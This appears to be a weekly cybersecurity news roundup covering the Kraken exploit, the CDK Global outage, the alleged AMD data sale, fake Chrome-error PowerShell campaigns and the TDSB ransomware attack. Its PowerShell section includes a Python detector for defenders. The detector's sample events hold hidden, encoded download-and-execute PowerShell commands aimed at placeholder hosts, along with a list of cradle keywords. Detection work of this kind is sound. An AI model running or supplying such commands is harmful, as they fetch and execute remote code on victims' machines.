Kraken Flaw Heist, CDK Cyberattack Hits, AMD Investigates Breach – Cybersecurity News [June 17, 2024]

by DuoCircle

 

Don’t miss out on the latest cybersecurity scoop of the week! We’ll be covering the $3 million stolen from Kraken, the cyberattack that has taken thousands of US car dealerships offline, the alleged AMD data leak, fake Chrome errors that trick users into installing malware, and the ransomware attack on the Toronto District School Board.

 

“Researchers” Use Kraken Exchange Flaw to Steal $3 Million in Cryptocurrency

Kraken, one of the larger crypto exchanges, disclosed this week that self-described security researchers stole $3 million in cryptocurrency by exploiting a zero-day bug on its platform.

Kraken’s Chief Security Officer, Nick Percoco, disclosed the incident and said the security team received a vague bug report on 9 June describing a zero-day that anyone could use to inflate the balance of their own account.

By exploiting the bug, an attacker could initiate a deposit and receive the funds in their Kraken account even when the deposit itself never completed. The security team isolated and fixed the bug within an hour and traced it to a recent user-experience change that credited accounts before the deposited assets had actually cleared, so the balance could be spent before settlement.

By the time the bug was fixed, three individuals had already exploited it and withdrawn $3 million from Kraken’s treasury. One of the three claimed to be a security researcher and said he had deposited just $4 to his account to prove that the bug worked and could be abused by threat actors.

The researcher refused to return the funds or provide any details of the bug, and instead demanded a call with Kraken’s sales representatives, saying the funds would be returned only once Kraken put a figure on how much the bug could have cost the exchange had it gone undisclosed.

Kraken described this as “extortion” rather than legitimate research. It has not named the individuals involved, is treating the incident as a criminal matter, and has notified law enforcement.


CDK Global Cyberattack Affects Thousands of US Car Dealerships

This week, CDK Global, a SaaS (Software as a Service) provider for car dealerships, suffered a significant cyberattack and shut down its IT systems in response.


CDK Global’s customers, which include more than 15,000 car dealerships across North America, could not run their businesses normally as a result. The company shut down its IT systems, phones, and applications to contain the attack. No spokesperson has shared details of the attack yet, but the company says it is assessing the impact.

In the meantime, dealership employees posting on a subreddit report that the systems tracking parts, sales, and even financing are down, forcing them to fall back on pen and paper; some dealerships have sent employees home. There has been no official statement on the cause, but the symptoms are consistent with a ransomware attack, and if that is what it is, the outage is likely to last for some time.

CDK says it is investigating the incident and has shut down most of its systems. Its phones, DMS (Dealer Management System), and Digital Retail products, along with Unify and DMS logins, are working again, and the company is testing its other applications; those found safe will be brought back online.

 

AMD Looks Into Breach After Data Appears for Sale on Hacking Forum

In other news, AMD is investigating a possible breach after a threat actor offered allegedly stolen AMD data for sale on a hacking forum.

The posted sample includes AMD employee information as well as financial and other confidential company data. AMD is working with law enforcement and third parties to investigate the incident and determine the significance of the sample.


IntelBroker, the threat actor claiming responsibility, posted screenshots of the data. They did not say how the data was obtained, only that they are selling information from an “AMD.com” breach. The listing was first reported by DarkWebInformer on X, who noted that the data set includes employee user IDs, first and last names, job functions, email addresses, employment status, and business phone numbers.

It remains to be seen whether the data comes from a new breach or an older one, but IntelBroker is a well-known threat actor who previously breached DC Health Link, exposing personal information of members and staff of the US House of Representatives.

 

Fake Google Chrome Errors Deceive Users Into Running Harmful PowerShell Scripts

A new malware distribution campaign uses fake Google Chrome, OneDrive, and Microsoft Word error messages to trick users into running PowerShell “fixes” that are in fact scripts that install malware.

Multiple threat actors are using the technique: the fake error prompts the victim to click a button that copies a PowerShell “fix” to the clipboard, then instructs them to paste and run it in the Windows Run dialog or a PowerShell terminal. The campaign was documented by Proofpoint, who noted that the chain works because it presents the victim with a problem and a solution at the same time, prompting them to act. Because the victim runs the command themselves, no vulnerability needs to be exploited, and the resulting PowerShell process is started by explorer.exe (the Run dialog) rather than by a browser or email client, which is what defenders should key on.

The script installs well-known malware families including Matanbuchus, NetSupport, XMRig, Lumma Stealer, and DarkGate. Proofpoint analyzed three attack chains. In the first, compromised websites load a malicious script hosted on the Binance Smart Chain (BSC) that shows a fake Google Chrome warning prompting the victim to “install a root certificate” by copying a PowerShell script to the clipboard; when executed, the script instead downloads the payloads.


In the second chain, the threat actors inject code into compromised websites that overlays a fake Google Chrome error on the page. The third is email-based: HTML attachments disguised as Microsoft Word documents prompt the user to install a “Word Online” extension to view the file. In that chain the PowerShell command downloads and executes MSI or VBS files, leading to a Matanbuchus or DarkGate infection on the victim’s device.

These attack patterns are effective precisely because the victim does the work, so treat any error message or document that asks you to copy and run a command as hostile and do not interact with it. On the defensive side, robust endpoint malware protection helps, as does logging interactive PowerShell use (script block and process-creation logging) and alerting when PowerShell launched from the Run dialog runs hidden, encoded, or download-and-execute commands.
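As an added example (not from Proofpoint’s research or the original post), here is a small Python detector that scores process-creation events for the shape of this chain: PowerShell started by explorer.exe (the Run dialog), a hidden window, an execution-policy bypass, a download-and-execute cradle, or a base64/UTF-16LE `-EncodedCommand` that it decodes and scans. The events, hostnames and paths are constructed for the example; the pattern list is this example’s own and is not a published signature set.

```python
import base64
import re
from typing import Dict, List, Optional

# Signals this example looks for. The fake-error "fix" commands lean on an
# interactive launch (parent explorer.exe), a hidden window, a policy bypass and
# a remote-fetch-then-run cradle, sometimes hidden behind -EncodedCommand.
# These regexes are the example's own, not a vendor signature set.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
    r"\biwr\b", r"invoke-webrequest", r"downloadstring", r"downloadfile",
    r"net\.webclient", r"https?://", r"start-bitstransfer", r"\bmsiexec\b",
]
HIDDEN_WINDOW = r"-w(?:indowstyle)?\s+hidden"
EXEC_BYPASS = r"-e(?:xecutionpolicy|p)\s+bypass"
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (no match on -ep).
ENCODED_ARG = r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), if any."""
    m = re.search(ENCODED_ARG, cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event; returns the signals that fired and a verdict."""
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    signals: List[str] = []
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"suspicious": False, "signals": signals, "decoded": None}

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        signals.append("encoded-command")
    # Scan the raw command line and the decoded payload together.
    text = (cmdline + " " + (decoded or "")).lower()

    if parent.endswith("explorer.exe"):
        signals.append("launched-from-explorer")  # Run dialog / double-click path
    if re.search(HIDDEN_WINDOW, text):
        signals.append("hidden-window")
    if re.search(EXEC_BYPASS, text):
        signals.append("execution-policy-bypass")
    if any(re.search(p, text) for p in CRADLE_PATTERNS):
        signals.append("download-cradle")

    # Verdict: a user-launched PowerShell that fetches remote content, hides its
    # window or arrives encoded matches the copy-paste social-engineering chain.
    launched_by_user = "launched-from-explorer" in signals
    evasive = {"hidden-window", "encoded-command", "execution-policy-bypass"} & set(signals)
    suspicious = launched_by_user and ("download-cradle" in signals or bool(evasive))
    return {"suspicious": suspicious, "signals": signals, "decoded": decoded}


def scan(events: List[Dict[str, str]]) -> List[int]:
    """Return the indexes of events the detector flags."""
    return [i for i, e in enumerate(events) if analyze_event(e)["suspicious"]]


# Constructed sample events in the shape of Sysmon Event ID 1 / Windows 4688 data.
# The URLs and paths are placeholders, not indicators from the real campaign.
_ENCODED = base64.b64encode(
    'Invoke-Expression (New-Object Net.WebClient).DownloadString("http://example.invalid/p.ps1")'
    .encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # 1) Pasted into the Run dialog: hidden window, bypass, irm | iex cradle.
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/fix.ps1)"'},
    # 2) Same chain, but the cradle is hidden inside -enc.
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": "powershell -nop -w hidden -enc " + _ENCODED},
    # 3) Scheduled admin script started from cmd.exe: benign.
    {"parent": r"C:\Windows\System32\cmd.exe", "image": _PS,
     "cmdline": r"powershell -NoProfile -File C:\scripts\nightly-backup.ps1"},
    # 4) A user opening PowerShell from Explorer and listing a directory: benign.
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": r"powershell -NoProfile -Command Get-ChildItem C:\Users"},
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        r = analyze_event(ev)
        print(i, "SUSPICIOUS" if r["suspicious"] else "ok", r["signals"])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The decode step matters: the second event looks harmless on the raw command line apart from the hidden window, and only the decoded UTF-16LE payload reveals the `DownloadString` cradle. The fourth event shows why the parent process alone is not enough to alert on; an interactive PowerShell from Explorer with no cradle and no evasion flags is normal user behaviour.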

 

Ransomware Attack Targets Toronto District School Board

The TDSB (Toronto District School Board) shared this week that it suffered a ransomware attack affecting its technology testing environment.

TDSB is one of Canada’s largest school boards. The board notified parents and guardians in an announcement that an unauthorized third party had accessed its technology testing environments and that an investigation is underway to determine the nature of the incident, its impact, and whether any information was affected.


The board says its systems remain operational and were not disrupted, and that the attack was contained. It has notified the police and is working with third-party cybersecurity experts. TDSB has nearly 40,000 employees and serves about 247,000 students, so any data leak would affect a large number of people.

Little information about the breach is available so far, but TDSB says it will notify affected individuals if there is evidence that data was exposed, and that it is also working to strengthen its ransomware protection measures.
